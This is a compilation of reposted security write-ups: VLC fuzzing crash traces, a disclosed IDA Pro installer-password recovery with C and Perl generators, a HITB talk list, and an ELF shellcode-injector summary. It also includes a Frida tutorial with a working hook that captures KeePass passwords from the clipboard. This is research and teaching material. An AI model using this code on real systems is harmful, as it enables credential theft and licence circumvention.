#1 0x7f674f15b6a1 in vlc_clone_attr /home/symeon/Desktop/vlc/src/posix/thread.c:421:11
#2 0x7f674f15b0ca in vlc_clone /home/symeon/Desktop/vlc/src/posix/thread.c:433:12
#3 0x7f674ef6e141 in input_Start /home/symeon/Desktop/vlc/src/input/input.c:200:25
--
==59286==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000041fa0 at pc 0x7fabef0d00a7 bp 0x7fabf7074bd0 sp 0x7fabf7074bc8
READ of size 8 at 0x602000041fa0 thread T5
#0 0x7fabef0d00a6 in mkv::demux_sys_t::FreeUnused() /home/symeon/Desktop/vlc/modules/demux/mkv/demux.cpp:267:34
#1 0x7fabef186e6e in mkv::Open(vlc_object_t*) /home/symeon/Desktop/vlc/modules/demux/mkv/mkv.cpp:257:12
#2 0x7fac0e2b01b4 in demux_Probe /home/symeon/Desktop/vlc/src/input/demux.c:180:15
#3 0x7fac0e1f82b7 in module_load /home/symeon/Desktop/vlc/src/modules/modules.c:122:15
--
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/symeon/Desktop/vlc/modules/demux/mkv/demux.cpp:267:34 in mkv::demux_sys_t::FreeUnused()
Shadow bytes around the buggy address:
0x0c04800003a0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
0x0c04800003b0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
0x0c04800003c0: fa fa fd fd fa fa 00 02 fa fa fd fd fa fa fd fd
0x0c04800003d0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa 00 00
--
==59343==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6250016a7a4f at pc 0x0000004ab6da bp 0x7f75e5457b10 sp 0x7f75e54572c0
READ of size 128 at 0x6250016a7a4f thread T15
#0 0x4ab6d9 in __asan_memcpy /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:22:3
#1 0x7f75ece563c2 in lavc_CopyPicture /home/symeon/Desktop/vlc/modules/codec/avcodec/video.c:435:13
#2 0x7f75ece52ac3 in DecodeBlock /home/symeon/Desktop/vlc/modules/codec/avcodec/video.c:1257:17
#3 0x7f75ece4d587 in DecodeVideo /home/symeon/Desktop/vlc/modules/codec/avcodec/video.c:1354:12
--
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:22:3 in __asan_memcpy
Shadow bytes around the buggy address:
0x0c4a802ccef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a802ccf00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a802ccf10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4a802ccf20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
--
==59411==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6040000716b4 at pc 0x0000004ab6da bp 0x7f97b4ea8290 sp 0x7f97b4ea7a40
READ of size 13104 at 0x6040000716b4 thread T5
#0 0x4ab6d9 in __asan_memcpy /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:22:3
#1 0x7f97aceb2858 in mkv::matroska_segment_c::TrackInit(mkv::mkv_track_t*)::TrackCodecHandlers::StringProcessor_1783_handler(char const*&, mkv::matroska_segment_c::TrackInit(mkv::mkv_track_t*)::HandlerPayload&) /home/symeon/Desktop/vlc/modules/demux/mkv/matroska_segment_parse.cpp:1807:25
#2 0x7f97aceb1e7b in mkv::matroska_segment_c::TrackInit(mkv::mkv_track_t*)::TrackCodecHandlers::StringProcessor_1783_callback(char const*, void*) /home/symeon/Desktop/vlc/modules/demux/mkv/matroska_segment_parse.cpp:1783:9
#3 0x7f97ace4ed16 in (anonymous namespace)::StringDispatcher::send(char const* const&, void* const&) const /home/symeon/Desktop/vlc/modules/demux/mkv/string_dispatcher.hpp:128:13
--
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:22:3 in __asan_memcpy
Shadow bytes around the buggy address:
0x0c0880006280: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd
0x0c0880006290: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd
0x0c08800062a0: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 02
0x0c08800062b0: fa fa 00 00 00 00 04 fa fa fa 00 00 00 00 00 04

Fantastic! We have our PoCs, along with decent symbolised traces revealing the exact lines where the crashes occurred!

Reviewing/Increasing coverage

By default, honggfuzz saves every new sample that produces new coverage into the same folder as our samples (this can be changed via the --covdir_all parameter). This is where things get interesting. Although we managed to discover a few vulnerabilities in our initial fuzzing, it's time to run all the produced coverage files again and see which comparisons honggfuzz could not get past (a.k.a. magic values, maybe CRC checksums or string comparisons). For this example, I will be re-running the previous bash script, feeding it the whole *.cov file set.

Figure 11: A total of 86254 files were saved during three days of fuzzing.
As you can see above, a total of 86254 files were saved because they produced new paths. Now it's time to iterate over those files again:

Figure 12: Iterating over the .cov files honggfuzz produced to measure new coverage.

Let's re-run the coverage and see how much code we hit!

Figure 13: Our improved coverage after iterating over the cov files honggfuzz produced.

So after three days of fuzzing, we bumped our overall coverage from 45.1% to 50%! Notice how Ebml_parser.cpp increased from the initial 71.5% to 96.8%, and in fact we were able to find some bugs in the EBML parsing functionality while fuzzing .mkv files!

What would be our next steps? How can we improve our coverage? After manually reviewing the coverage, it turns out that functions such as void matroska_segment_c::ParseAttachments( KaxAttachments *attachments ) were never hit!

Figure 14: Coverage showing no execution of the ParseAttachments code base.

After a bit of research, it turns out that a tool named mkvpropedit can be used to add attachments to our sample files. Let's try that:

$ mkvpropedit SampleVideo_720x480_5mb.mkv --add-attachment '/home/symeon/Pictures/Screenshot from 2019-03-24 11-47-04.png'

Figure 15: Adding attachments to an existing mkv file.
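To apply the same trick to the whole corpus rather than a single file, a small loop does the job. A hedged sketch (mkvpropedit and --add-attachment are standard mkvtoolnix options; the sample directory matches this walkthrough, and cover.png is just a stand-in for any attachment file you have lying around):

$ for f in ~/Desktop/mkv_samples/*.mkv; do
>     mkvpropedit "$f" --add-attachment ~/Pictures/cover.png
> done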
Brilliant, this looks like it worked! Finally, let's confirm it by setting a breakpoint on the relevant code and running VLC with the new sample:

Figure 16: Hitting our breakpoint and expanding our coverage!

Excellent! We've managed to successfully create a new attachment and hit new functions within the mkv::matroska_segment codebase! Our next step would be to apply this technique more broadly: adjust the samples and fuzz our target afresh!

Discovered vulnerabilities

After running our fuzzing project for two weeks, as you can see from the following screenshot, we performed a total of 1 million executions (!), resulting in 1547 crashes, of which 36 were unique.

Figure 17: 36 unique crashes after fuzzing VLC for 15 days!

Figure 18: A double free vulnerability while parsing a malformed mkv file.

Many crashes were divisions by zero and null pointer dereferences. A few heap-based out-of-bounds writes were also discovered, which we were not able to reproduce reliably. However, the following five vulnerabilities were disclosed to the VLC security team.

1. Double Free in mkv::mkv_track_t::~mkv_track_t()

==79009==ERROR: AddressSanitizer: attempting double-free on 0x602000048e50 in thread T5:
mkv demux error: Couldn't allocate buffer to inflate data, ignore track 4
[000061100006a080] mkv demux error: Couldn't handle the track 4 compression
#0 0x4ac420 in __interceptor_free /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cc:123:3
#1 0x7fb7722c3b6f in mkv::mkv_track_t::~mkv_track_t() /home/symeon/Desktop/vlc/modules/demux/mkv/mkv.cpp:895:5
#2 0x7fb77214ad4b in mkv::matroska_segment_c::ParseTrackEntry(libmatroska::KaxTrackEntry const*) /home/symeon/Desktop/vlc/modules/demux/mkv/matroska_segment_parse.cpp:992:13

The above vulnerability was fixed with the release of VLC 3.0.7, based on the following commit: http://git.videolan.org/?p=vlc.git;a=commit;h=81023659c7de5ac2637b4a879195efef50846102.

2. Free on address which was not malloc()-ed in es_format_Clean

[000061100005ff40] mkv demux error: cannot load some cues/chapters/tags etc. (broken seekhead or file)
[000061100005ff40] =================================================================
==92463==ERROR: AddressSanitizer: attempting free on address which was not malloc()-ed: 0x02d000000000 in thread T5
mkv demux error: cannot use the segment
#0 0x4ac420 in __interceptor_free /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cc:123:3
#1 0x7f7470232230 in es_format_Clean /home/symeon/Desktop/vlc/src/misc/es_format.c:496:9
#2 0x7f7452f82a6c in mkv::mkv_track_t::~mkv_track_t() /home/symeon/Desktop/vlc/modules/demux/mkv/mkv.cpp:892:5
#3 0x7f7452dd78e4 in std::default_delete<mkv::mkv_track_t>::operator()(mkv::mkv_track_t*) const /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/unique_ptr.h:81:2

3. Heap Out Of Bounds Read in lavc_CopyPicture

libva error: va_getDriverName() failed with unknown libva error,driver_name=(null)
[00006060001d1860] decdev_vaapi_drm generic error: vaInitialize: unknown libva error
[h264 @ 0x6190000a4680] top block unavailable for requested intra mode -1
[h264 @ 0x6190000a4680] error while decoding MB 10 0, bytestream 71
=================================================================
==104180==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62500082c24f at pc 0x0000004ab6da bp 0x7f6f5ac3faf0 sp 0x7f6f5ac3f2a0
READ of size 128 at 0x62500082c24f thread T8
#0 0x4ab6d9 in __asan_memcpy /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:22:3
#1 0x7f6f5ad1748f in lavc_CopyPicture /home/symeon/Desktop/vlc/modules/codec/avcodec/video.c:435:13
#2 0x7f6f5ad13b89 in DecodeBlock /home/symeon/Desktop/vlc/modules/codec/avcodec/video.c:1259:17
#3 0x7f6f5ad0e537 in DecodeVideo /home/symeon/Desktop/vlc/modules/codec/avcodec/video.c:1356:12

4. Heap Out Of Bounds Read in mkv::demux_sys_t::FreeUnused()

[0000611000069f40] mkv demux error: No tracks supported
=================================================================
==81972==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000482c0 at pc 0x7f0a692c7a37 bp 0x7f0a6bf2ac10 sp 0x7f0a6bf2ac08
READ of size 8 at 0x6020000482c0 thread T7
#0 0x7f0a692c7a36 in mkv::demux_sys_t::FreeUnused() /home/symeon/Desktop/vlc/modules/demux/mkv/demux.cpp:267:34
#1 0x7f0a6937eaf1 in mkv::Open(vlc_object_t*) /home/symeon/Desktop/vlc/modules/demux/mkv/mkv.cpp:257:12
#2 0x7f0a86792691 in demux_Probe /home/symeon/Desktop/vlc/src/input/demux.c:180:15
#3 0x7f0a866d8d17 in module_load /home/symeon/Desktop/vlc/src/modules/modules.c:122:15
5. Heap Out Of Bounds Read in mkv::matroska_segment_c::TrackInit

=================================================================
==83326==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6040000b3134 at pc 0x0000004ab6da bp 0x7ffb4f076250 sp 0x7ffb4f075a00
READ of size 13104 at 0x6040000b3134 thread T7
#0 0x4ab6d9 in __asan_memcpy /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:22:3
#1 0x7ffb4d84008d in mkv::matroska_segment_c::TrackInit(mkv::mkv_track_t*)::TrackCodecHandlers::StringProcessor_1783_handler(char const*&, mkv::matroska_segment_c::TrackInit(mkv::mkv_track_t*)::HandlerPayload&) /home/symeon/Desktop/vlc/modules/demux/mkv/matroska_segment_parse.cpp:1807:25
#2 0x7ffb4d83f6ab in mkv::matroska_segment_c::TrackInit(mkv::mkv_track_t*)::TrackCodecHandlers::StringProcessor_1783_callback(char const*, void*) /home/symeon/Desktop/vlc/modules/demux/mkv/matroska_segment_parse.cpp:1783:9
#3 0x7ffb4d7dc486 in (anonymous namespace)::StringDispatcher::send(char const* const&, void* const&) const /home/symeon/Desktop/vlc/modules/demux/mkv/string_dispatcher.hpp:128:13

Note: Some of these bugs had also been previously discovered and disclosed via the HackerOne bug bounty, and the rest of the bugs have not been addressed as of now.

Advanced fuzzing with libFuzzer

While searching for previous techniques, I stumbled upon this blog post, where one of the VLC developers used libFuzzer to get deeper coverage. The developer used, for example, vlc_stream_MemoryNew() (https://www.videolan.org/developers/vlc/doc/doxygen/html/stream__memory_8c.html), which reads data from a byte stream, and fuzzed the demux process directly. As expected, he managed to find a few interesting vulnerabilities. This proves that the more effort you put into writing your own harness and researching your target, the better the results (and bugs) you will get!

Takeaways

We started with zero knowledge of how VLC works, and we learnt how to create a very simple harness based on the documentation (which was unsuccessful). We nevertheless continued by instrumenting VLC with honggfuzz, and although the standard process of instrumenting the binary (hfuzz-clang) didn't work, we were able to tweak the parameters a bit and successfully instrument the binary. We continued by gathering samples, compiled and linked VLC against the libhfuzz library to add coverage support, started the fuzzing process, got crashes and triaged them! We were then able to measure our initial coverage and improve our samples, increasing the overall coverage. Targeting only the .mkv format, we saw that we were able to reach a total of 50% coverage of the mkv code. Remember that VLC supports a large number of different video and audio file formats; sure enough, there is still a lot of code that can be fuzzed! Finally, although we used a relatively fast VM for this project, it should be noted that even a slow 4 GB VM can be used and still give you bugs!

Acknowledgements

This blog post would not have been possible without guidance from @robertswiecki, who helped with the compilation and linkage process and gave me the tips and tricks described in this guide. Finally, thanks to @AlanMonie and @Yekki_1 for helping me with the fuzzing VM. VideoLAN have issued an advisory.

Sursa: https://www.pentestpartners.com/security-blog/double-free-rce-in-vlc-a-honggfuzz-how-to/
  7. Operation Crack: Hacking IDA Pro Installer PRNG from an Unusual Way

Advisory by Shaolin on 2019-06-21 (English version / Chinese version)

Introduction

Today, we are going to talk about the installation password of Hex-Rays IDA Pro, the famous disassembler and decompiler. What is an installation password? Generally, customers receive a custom installer and an installation password after they purchase IDA Pro, and the password is required during the installation process. However, if someday we find a leaked IDA Pro installer, is it still possible to install it without an installation password? This is an interesting question. After brainstorming with our team members, we verified the answer: Yes! With a Linux or MacOS installer, we can easily find the password directly. With a Windows installer, we only need about 10 minutes to calculate the password. The following is the detailed process:

* Linux and MacOS version

The first challenge is the Linux and MacOS version. The installer is built with an installer creation tool called InstallBuilder. We found the plaintext installation password directly in the program memory of the running IDA Pro installer. Mission complete! This problem was fixed after we reported it through Hex-Rays: BitRock released InstallBuilder 19.2.0 with protection for the installation password on 2019/02/11.

* Windows version

It gets harder with the Windows version, because the installer is built with Inno Setup, which stores its password as a 160-bit SHA-1 hash. Therefore, we cannot get the password simply by statically or dynamically analyzing the installer, and brute force is apparently not an effective approach. But the situation is different if we can grasp the password-generation methodology, which would let us enumerate candidate passwords far more effectively!

Although we had realized we needed to find out how Hex-Rays generates passwords, it was still really difficult, as we did not know which language the random number generator was implemented in. There are at least 88 known random number generators: that is a lot of variation. We first tried to find the charset used by the random number generator. We collected all the leaked installation passwords we could, such as Hacking Team's passwords leaked by WikiLeaks:

FgVQyXZY2XFk (link)
7ChFzSbF4aik (link)
ZFdLqEM2QMVe (link)
6VYGSyLguBfi (link)

From the collected passwords we can summarize the charset:

23456789ABCDEFGHJKLMPQRSTUVWXYZabcdefghijkmpqrstuvwxyz

The absence of 1, I, l, 0, O, o, N, n makes sense, as these are easily confused characters. Next, we guessed possible charset orderings like these:

23456789ABCDEFGHJKLMPQRSTUVWXYZabcdefghijkmpqrstuvwxyz
ABCDEFGHJKLMPQRSTUVWXYZ23456789abcdefghijkmpqrstuvwxyz
23456789abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ
abcdefghijkmpqrstuvwxyz23456789ABCDEFGHJKLMPQRSTUVWXYZ
abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ23456789
ABCDEFGHJKLMPQRSTUVWXYZabcdefghijkmpqrstuvwxyz23456789

Lastly, we picked some common languages (C/PHP/Python/Perl) to implement a random number generator and enumerate all the combinations. Then we examined whether the collected passwords appeared in the output. For example, here is a generator written in C:

#include <stdio.h>
#include <stdlib.h>

char _a[] = "23456789ABCDEFGHJKLMPQRSTUVWXYZabcdefghijkmpqrstuvwxyz";
char _b[] = "ABCDEFGHJKLMPQRSTUVWXYZ23456789abcdefghijkmpqrstuvwxyz";
char _c[] = "23456789abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ";
char _d[] = "abcdefghijkmpqrstuvwxyz23456789ABCDEFGHJKLMPQRSTUVWXYZ";
char _e[] = "abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ23456789";
char _f[] = "ABCDEFGHJKLMPQRSTUVWXYZabcdefghijkmpqrstuvwxyz23456789";

int main()
{
    char bufa[21]={0};
    char bufb[21]={0};
    char bufc[21]={0};
    char bufd[21]={0};
    char bufe[21]={0};
    char buff[21]={0};
    /* 64-bit counter: with a 32-bit 'unsigned int', the comparison
       against 0x100000000 would never become false and the loop
       would never terminate */
    unsigned long long i=0;
    while(i<0x100000000ULL)
    {
        srand((unsigned int)i);
        for(size_t n=0;n<20;n++)
        {
            int key = rand() % 54;
            bufa[n]=_a[key];
            bufb[n]=_b[key];
            bufc[n]=_c[key];
            bufd[n]=_d[key];
            bufe[n]=_e[key];
            buff[n]=_f[key];
        }
        printf("%s\n",bufa);
        printf("%s\n",bufb);
        printf("%s\n",bufc);
        printf("%s\n",bufd);
        printf("%s\n",bufe);
        printf("%s\n",buff);
        i=i+1;
    }
    return 0;
}
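Since the generator above prints six candidate strings (one per charset ordering) for every 32-bit seed, checking whether a leaked password ever shows up is just a matter of piping the output through grep. A hedged usage sketch (gen.c is my name for the file above; a plain substring match is enough, because a 12-character password generated from a given seed is a prefix of the 20-character string that seed produces here, though scanning all 2^32 seeds still takes a long while):

$ gcc -O2 gen.c -o gen
$ ./gen | grep -m1 -nF 'FgVQyXZY2XFk'

From the matching line number n you can recover both the seed ((n-1)/6) and which charset ordering hit ((n-1)%6).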
After a month, we finally generated the IDA Pro installation passwords successfully with Perl, and the correct charset ordering is abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ23456789. For example, we can generate Hacking Team's leaked password FgVQyXZY2XFk with the following script:

#!/usr/bin/env perl
#
@_e = split //,"abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ23456789";
$seed=3326487116;   # kept in its own variable so the loop counter below doesn't clobber it
srand($seed);
$pw="";
for($i=0;$i<12;++$i) {
    $key = rand 54;
    $pw = $pw . $_e[$key];
}
print "$seed $pw\n";

With this, we can build a dictionary of installation passwords, which greatly increases the efficiency of a brute-force attack. Generally, we can compute the password of one installer in about 10 minutes. We have reported this issue to Hex-Rays, and they promised to harden the installation password immediately.

Summary

In this article, we discussed the possibility of installing IDA Pro without owning an installation password. In the end, we found the plaintext password in the program memory of the Linux and MacOS versions. For the Windows version, we determined the password-generation methodology, so we can build a dictionary to accelerate a brute-force attack and, finally, recover a password in a reasonable amount of time.

We really enjoyed this process: surmise wisely and prove it as best you can. It broadens our experience whether or not the result turns out to be correct. This is why we took a whole month to verify such a difficult surmise. We take the same attitude in our Red Team Assessments. Give it a try!

Lastly, we would like to thank Hex-Rays for their friendly and rapid response. Although this issue is not included in their Security Bug Bounty Program, they still generously awarded us the IDA Pro Linux and Mac versions, and upgraded the Windows version for us. We really appreciate it.

Timeline

Jan 31, 2019 - Report to Hex-Rays
Feb 01, 2019 - Hex-Rays promised to harden the installation password and reported to BitRock
Feb 11, 2019 - BitRock released InstallBuilder 19.2.0

Sursa: https://devco.re/blog/2019/06/21/operation-crack-hacking-IDA-Pro-installer-PRNG-from-an-unusual-way-en/
  8. I don't know what that CTI thing is about; I wrote a few things here, I hope they help you:
  9. #HITB2019AMS talk recordings (Hack In The Box Security Conference):

PRECONF PREVIEW - The End Is The Beginning Is The End: Ten Years In The NL Box
PRECONF PREVIEW - The Beginning of the End? A Return to the Abyss for a Quick Look
KEYNOTE: The End Is The Beginning Is The End: Ten Years In The NL Box - D. Kannabhiran
D1T1 - Make ARM Shellcode Great Again - Saumil Shah
D1T2 - Hourglass Fuzz: A Quick Bug Hunting Method - M. Li, T. Han, L. Jiang and L. Wu
D1T1 - TOCTOU Attacks Against Secure Boot And BootGuard - Trammell Hudson & Peter Bosch
D1T2 - Hidden Agendas: Bypassing GSMA Recommendations On SS7 Networks - Kirill Puzankov
D1T1 - Finding Vulnerabilities In iOS/MacOS Networking Code - Kevin Backhouse
D1T2 - fn_fuzzy: Fast Multiple Binary Diffing Triage With IDA - Takahiro Haruyama
D1T3 - How To Dump, Parse, And Analyze i.MX Flash Memory Chips - Damien Cauquil
D1T1 - The Birdman: Hacking Cospas-Sarsat Satellites - Hao Jingli
D1T2 - Duplicating Black Box Machine Learning Models - Rewanth Cool and Nikhil Joshi
D1T3 - Overcoming Fear: Reversing With Radare2 - Arnau Gamez Montolio
D1T1 - Deobfuscate UEFI/BIOS Malware And Virtualized Packers - Alexandre Borges
D1T2 - Researching New Attack Interfaces On iOS And OSX - Lilang Wu and Moony Li
D1T1 - A Successful Mess Between Hardening And Mitigation - Weichselbaum & Spagnuolo
D1T2 - For The Win: The Art Of The Windows Kernel Fuzzing - Guangming Liu
D1T3 - Attacking GSM - Alarms, Smart Homes, Smart Watches And More - Alex Kolchanov
D1T1 - SeasCoASA: Exploiting A Small Leak In A Great Ship - Kaiyi Xu and Lily Tang
D1T2 - H(ack)DMI: Pwning HDMI For Fun And Profit - Jeonghoon Shin and Changhyeon Moon
D1T1 - Pwning Centrally-Controlled Smart Homes - Sanghyun Park and Seongjoon Cho
D1T2 - Automated Discovery Of Logical Priv. Esc. Bugs In Win10 - Wenxu Wu and Shi Qin

Sursa:
  10. Fun With Frida

James, Jun 2

In this post, we're going to take a quick look at Frida and use it to steal credentials from KeePass. According to their website, Frida is a "dynamic instrumentation framework". Essentially, it allows us to inject into a running process and then interact with that process via JavaScript. It's commonly used for mobile app testing, but it is supported on Windows, OSX and *nix as well.

KeePass is a free and open-source password manager with official builds for Windows; unofficial releases exist for most Linux flavors. We are going to look at the latest official Windows version 2 release (2.42.1). To follow along, you will need Frida, KeePass and Visual Studio (or any other editor you want to load a .NET project in). You will also need the KeePass source from https://keepass.info/download.html

The first step is figuring out what we want to achieve. Like most password managers, KeePass protects stored credentials with a master password. This password is entered by the user and allows the KeePass database to be accessed. Once unlocked, usernames and passwords can be copied to the clipboard so they can be entered elsewhere. Given that password managers allow the easy use of strong passwords, it's a fairly safe assumption that users will be copying and pasting passwords. Let's take a look at how KeePass interacts with the clipboard.

After a bit of digging (hint: the search tool is your friend), we find some references to the "SetClipboardData" Windows API call. It looks like KeePass is calling into the native Windows API to manage the clipboard. Looking at which calls reference this method, we find one reference within the ClipboardUtil.Windows.cs class. It looks like the "SetDataW" method is how KeePass interacts with the clipboard.

private static bool SetDataW(uint uFormat, byte[] pbData)
{
    UIntPtr pSize = new UIntPtr((uint)pbData.Length);
    IntPtr h = NativeMethods.GlobalAlloc(NativeMethods.GHND, pSize);
    if(h == IntPtr.Zero) { Debug.Assert(false); return false; }

    Debug.Assert(NativeMethods.GlobalSize(h).ToUInt64() >=
        (ulong)pbData.Length); // Might be larger

    IntPtr pMem = NativeMethods.GlobalLock(h);
    if(pMem == IntPtr.Zero)
    {
        Debug.Assert(false);
        NativeMethods.GlobalFree(h);
        return false;
    }

    Marshal.Copy(pbData, 0, pMem, pbData.Length);
    NativeMethods.GlobalUnlock(h); // May return false on success

    if(NativeMethods.SetClipboardData(uFormat, h) == IntPtr.Zero)
    {
        Debug.Assert(false);
        NativeMethods.GlobalFree(h);
        return false;
    }

    return true;
}

This code uses native method calls to allocate some memory, writes the supplied pbData byte array to that location, and then calls the SetClipboardData API, passing a handle to the memory containing the contents of pbData. To confirm this is the code we want to target, we can add a breakpoint and debug the app.

Before we can build the solution, we need to fix up the signing key. The easiest way is just to disable signing for the KeePass and KeePassLib projects (right click -> Properties -> Signing -> uncheck "Sign the assembly" -> save). If you get a build error, double-check that you have disabled signing and try again.

With our breakpoint set we can run KeePass, open a database and copy a credential (right click -> copy password). Our breakpoint is hit and we can inspect the value of pbData. In this case, the copied password was "AABBCCDD", which matches the bytes shown. We can confirm this by adding a bit of code to the method and re-running our test.
var str = System.Text.Encoding.Default.GetString(pbData);

This will convert the pbData byte array to a string, which we can inspect with the debugger. This looks like a good method to target, as the app only calls the SetClipboardData native API in one place (meaning we shouldn't need to filter out any calls we don't care about). Time to fire up Frida.

Before we get into hooking the KeePass application, we need a way to inject Frida. For this example, we are going to use a simple Python 3 script:

import frida
import sys
import codecs

def on_message(message, data):
    if message['type'] == 'send':
        print(message['payload'])
    elif message['type'] == 'error':
        print(message['stack'])
    else:
        print(message)

try:
    session = frida.attach("KeePass.exe")
    print("[+] Process Attached")
except Exception as e:
    print(f"Error => {e}")
    sys.exit(0)

with codecs.open('./Inject.js', 'r', 'utf-8') as f:
    source = f.read()

script = session.create_script(source)
script.on('message', on_message)
script.load()

try:
    while True:
        pass
except KeyboardInterrupt:
    session.detach()
    sys.exit(0)

This looks complicated, but doesn't actually do that much. The interesting part happens inside the try/except block. We attempt to attach to the "KeePass.exe" process, then inject a .js file containing our code to interact with the process, and set up messaging. The "on_message" function allows messages to be received from the target process, which we just print to the console. This code is basically generic, so you can re-use it for any other process you want to target.

Our code to interact with the process will be written in the "Inject.js" file. First, we need to grab a reference to the SetClipboardData API:

var user32_SetClipboardData = Module.findExportByName("user32.dll", "SetClipboardData")

We can then attach to this call, which sets up our hook:

// Attach a hook to the native pointer
Interceptor.attach(user32_SetClipboardData, {
    onEnter: function (args, state) {
        console.log("[+] KeePass called SetClipboardData");
    },
    onLeave: function (retval) {
    }
});

The "onEnter" method is called as the target process calls SetClipboardData. "onLeave", as you might expect, is called just before the hooked method returns. I've added a simple console.log call to the onEnter function, which will let us test our hook and make sure we aren't getting any erroneous API calls showing up.

With KeePass.exe running (you can use the official released binary now, no need to run the debug version from Visual Studio), run the Python script. You should see the "process attached" message. Unlock KeePass and copy a credential. You should see the "KeePass called SetClipboardData" message. KeePass, by default, clears the clipboard after 12 seconds, so you will see another "KeePass called SetClipboardData" message when this occurs. We can strip that out later.
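If you haven't used Frida before, getting the loader running takes only a couple of commands. A hedged sketch (frida and frida-tools are the standard PyPI package names; inject.py is simply my name for the Python loader above):

pip install frida frida-tools
python inject.py    # with KeePass.exe already running and a database open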
Looking at the SetClipboardData API documentation, we can see that two parameters are passed: a format value and a handle. The handle is essentially a pointer to the memory address containing the data to add to the clipboard. For this example, we can safely ignore the format value (this is used to specify the type of data to be added to the clipboard). KeePass uses one of two format values; I'll leave it as an exercise for the reader to modify the PoC to support both formats fully. The main thing we need to know is that the second argument is the memory address we want to access. In Frida, we gain access to arguments passed to hooked methods via the "args" array. We can then use the Frida API to read data from the address passed to hMem:

// Get a native pointer to SetClipboardData
var user32_SetClipboardData = Module.findExportByName("user32.dll", "SetClipboardData")

// Attach a hook to the native pointer
Interceptor.attach(user32_SetClipboardData, {
    onEnter: function (args, state) {
        console.log("[+] KeePass called SetClipboardData");
        var ptr = args[1].readPointer().readByteArray(32);
        console.log(ptr)
    },
    onLeave: function (retval) {
    }
});

Here we call readPointer() on args[1], then read a byte array from it. Note that the call to readByteArray() requires a length value, which we don't have. While it should be possible to grab this from other calls, we can sidestep this complexity by simply reading a set number of bytes. This may be a slightly naive approach, but it's sufficient for our purposes.

Kill the Python script and re-run it (you don't need to restart KeePass). Copy some data and you should see the byte array written to the console. Frida automatically formats the byte array for us. We can see the password "AABBCCDD" being set on the clipboard, followed by "--" 12 seconds later. This is the string KeePass uses to overwrite the clipboard data.

This is enough information to flesh out our PoC. We can convert the byte array to a string, then check whether the string starts with "--" to discard the data when KeePass clears the clipboard. Note that this is, again, a fairly naive approach and introduces an obvious bug where a password starting with "--" would not be captured. Another exercise for the reader! This gives us our complete PoC:

// Get a native pointer to SetClipboardData
var user32_SetClipboardData = Module.findExportByName("user32.dll", "SetClipboardData")

// Attach a hook to the native pointer
Interceptor.attach(user32_SetClipboardData, {
    onEnter: function (args, state) {
        console.log("[+] KeePass called SetClipboardData");
        var ptr = args[1].readPointer().readByteArray(32);
        var str = ab2str(ptr);
        if(!str.startsWith("--")){
            console.log("[+] Captured Data!")
            console.log(str);
        }
        else{
            console.log("[+] Clipboard was cleared")
        }
    },
    onLeave: function (retval) {
    }
});

function ab2str(buf){
    return String.fromCharCode.apply(null, new Uint16Array(buf));
}

The ab2str function converts a byte array to a string; the rest should be self-explanatory. If we run this PoC we should see the captured password and a message telling us the clipboard was cleared.

That's all for this post. There is obviously some work to do before we could use this on an engagement, but we can see how powerful Frida can be. It's worth noting that you do not need any privileges to inject into the KeePass process: all the examples were run with KeePass and CMD running as a standard user.

James
Purveyor of fine, handcrafted, artisanal cybers.

Sursa: https://medium.com/@two06/fun-with-frida-5d0f55dd331a
  11. 0pack
Description

An ELF x64 binary payload injector written in C++ using the LIEF library. It injects shellcode written in fasm as relocations into the header. Execution begins at entrypoint 0, i.e. the header, which confuses or downright breaks debuggers. The whole first segment is rwx; this can be mitigated at runtime through an injected payload which sets the binary's segment to just rx.

Compiler flags

The targeted binary must be built with the following flags:

gcc -m64 -fPIE -pie

Statically linking is not possible, as -pie and -static are incompatible flags. Or in other terms:

> -static means a statically linked executable with no dynamic relocations and only PT_LOAD segments.
> -pie means a shared library with dynamic relocations and PT_INTERP and PT_DYNAMIC segments.

Presentation links

HTML: https://luis-hebendanz.github.io/0pack/
PDF: https://github.com/Luis-Hebendanz/0pack/raw/master/0pack-presentation.pdf
Video: https://github.com/Luis-Hebendanz/0pack/raw/master/html/showcase_video.webm

Debugger behaviour

